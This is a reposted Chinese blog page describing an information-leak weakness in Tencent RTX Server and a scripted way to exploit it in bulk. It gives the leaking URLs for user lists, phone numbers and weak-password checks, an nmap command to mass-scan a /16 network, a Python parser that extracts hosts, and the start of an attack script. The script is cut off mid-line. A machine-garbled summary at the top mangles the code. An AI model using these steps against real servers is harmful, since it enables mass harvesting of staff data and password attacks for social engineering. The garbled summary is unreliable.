rtx信息泄漏利结合弱口令导致被批量社工思路

摘要:
/Usr/bin/envpython#-*-coding=utf-8-*-importxml。树ElementTreesTree=ET。parse(“out.xml”)doc=树。xindoc:ifx的getroot()。tag=='host':xlist=x。getchildren()ports=xlist[3]port=ports。getchildren()[0]状态=端口。getchildren()[0]ifstate。get('state')=='open':printxlist[1]。get('addr')第3步xserverattach脚本#!

腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.

rtx server 存在暴露用户信息的漏洞,通过web访问

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令

脚本化攻击思路:

  1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
  2. 分析out.xml文件提取开放8012端口的ip
  3. rtx攻击脚本处理这些ip,探测弱口令

步骤2 分析nmap结果的脚本xml.py

#!/usr/bin/env python
#-*- coding= utf-8 -*-
import xml.etree.ElementTree as ET

tree = ET.parse("out.xml")
doc = tree.getroot()
for x in doc:
    if x.tag == 'host':
        xlist = x.getchildren()
        ports  = xlist[3]
        port = ports.getchildren()[0]
        state = port.getchildren()[0]
        if state.get('state') == 'open':
            print xlist[1].get('addr')

步骤3 rtx server attack 脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# author : l137
# rtx hack

import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
    print '''
Usage : ./f.py -u target_ip
-h   Show this page!
'''

class postThread(threading.Thread):
 
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data
    def run(self):
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e
                

class rtx(object):
    'rtx attacker class'
    ip = ''

    data = ''

    port = '8012'
    
    fullData = ''
    

    def __init__(self, ip):
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                print "

免责声明:内容来源于网络,仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇numa节点大页FormData 知识点下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

wx.setStorage、wx.getStorage和wx.getStorageSync

Page({ data: { testnum:""//设置测试参数 }, test:function(){ var Num = this.data.testnum; wx.setStorage({//存储到本地 key:"testNum", data:Num }) } }) Page...

layui 二级联动

layui 二级联动 HTML 部分 <form onsubmit="return false;"action="__SELF__"data-auto="true"method="post"class='form-horizontal layui-form' style='padding-top:20px'><input type="h...

bpc 数据处理

UJKT程序:UJO_SQE_TESTBADI:UJ_CUSTOM_LOGIC*XDIM_MEMBERSET Z_ACCOUNT = PL04 *START_BADI PL04_STEP1 WRITE = ON QUERY = ON *END_BADI *定义模型 types:begin of ty_planning, m...

python websocket Django 实时消息推送

概述: WebSocket 是什么? WebSocket 是 HTML5 提供的一种浏览器与服务器间进行全双工通讯的协议。依靠这种协议可以实现客户端和服务器端 ,一次握手,双向实时通信。 WebSocket 服务端: 用的是 dwebsocket,安装命令pip installdwebsocket. WebSocket 基本方法: 1.request.i...

Android 中的一些特殊目录与文件

用作命令的二进制文件位于/system/bin/与/system/xbin/下 应用数据位于/data/data/, 原始安装文件位于/data/app/(Play商店中非免费应用位于/data/app-private/) 权限相关的文件位于/system/etc/permissions/, 其中权限与权限组的文件是platform.xml 系统启动时in...

iframe+postMessage不同源页面通信

父页面 父页面运行在8080端口,通过iframe标签引用子页面,通过postMessage发送消息给iframe中的子页面。 <template> <div class="hello"> <iframe src="http://10.10.30.5:8081" height="100%"><...